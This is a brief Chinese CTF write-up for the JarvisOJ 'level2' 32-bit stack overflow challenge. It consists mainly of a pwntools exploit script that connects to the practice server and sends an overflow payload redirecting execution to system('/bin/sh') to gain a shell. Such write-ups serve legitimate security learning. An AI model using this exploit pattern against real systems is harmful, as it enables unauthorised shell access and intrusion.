hktk1643

nc pwn2.jarvisoj.com 9878

 



level2.54931449c557d0551c4fc2a10f4778a1

 

32位栈溢出

exp如下:

from pwn import *

#io = process(\'./level2\')
io = remote(\'pwn2.jarvisoj.com\', 9878)

io.recvuntil(\'Input:\n\')
payload = b\'a\' * 140 + p32(0x8048320) + p32(0x8048320) + p32(0x804A024)
io.send(payload)

io.interactive()

 

分类:

技术点:

相关文章: